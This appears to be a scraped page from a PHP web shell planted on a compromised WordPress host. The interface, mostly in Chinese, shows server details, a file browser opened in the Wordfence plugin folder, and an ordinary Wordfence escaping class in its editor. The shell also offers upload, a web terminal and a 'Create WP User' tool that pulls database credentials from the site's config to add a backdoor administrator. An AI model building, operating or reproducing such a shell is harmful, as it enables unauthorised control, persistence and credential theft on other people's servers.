Linux webm017.cluster130.gra.hosting.ovh.net 5.15.206-ovh-vps-grsec-zfs-classid x86_64
PHP/7.4.33
服务器IP :
10.130.20.17
& 您的IP :
216.73.216.193
域名 :
无法读取 [ /etc/named.conf ]
用户 :
koaigpw
上传
终端
新建文件
新建文件夹
Create WP User
登出
+
/
home
/
koaigpw
/
budomat.net.pl
/
wp-content
/
plugins
/
wordfence
/
modules
/
login-security
/
classes
/
model
/
text
/
[ 返回根目录 ]
名称
大小
权限
修改时间
操作
..
-
-
-
html.php
493.00 B
-rw-r--r--
2026-02-24 12:20
javascript.php
1.15 KB
-rw-r--r--
2026-02-24 12:20
>_
终端
关闭 ✕
输入 'help' 查看可用命令。
koaigpw@
>
新建文件
文件名
取消
创建
重命名
新名称
取消
重命名
Create WordPress User
Auto (baca dari file CMS)
Manual (isi kredensial DB)
代码编辑器 :
javascript.php
<?php namespace WordfenceLS\Text; /** * Represents text that is already JavaScript-safe and should not be encoded again. * @package Wordfence2FA\Text */ class Model_JavaScript { private $_javaScript; /** * Returns a string escaped for use in JavaScript. This is almost identical in behavior to esc_js except that * we don't call _wp_specialchars and keep \r rather than stripping it. * * @param string|Model_JavaScript $content * @return string */ public static function esc_js($content) { if (is_object($content) && ($content instanceof Model_HTML)) { return (string) $content; } $safe_text = wp_check_invalid_utf8($content); $safe_text = preg_replace('/&#(x)?0*(?(1)27|39);?/i', "'", stripslashes($safe_text)); $safe_text = str_replace("\r", '\\r', $safe_text); $safe_text = str_replace("\n", '\\n', addslashes($safe_text)); return apply_filters('js_escape', $safe_text, $content); } public static function echo_string_literal($string) { echo "'" . self::esc_js($string) . "'"; } public function __construct($javaScript) { $this->_javaScript = $javaScript; } public function __toString() { return $this->_javaScript; } }
关闭
保存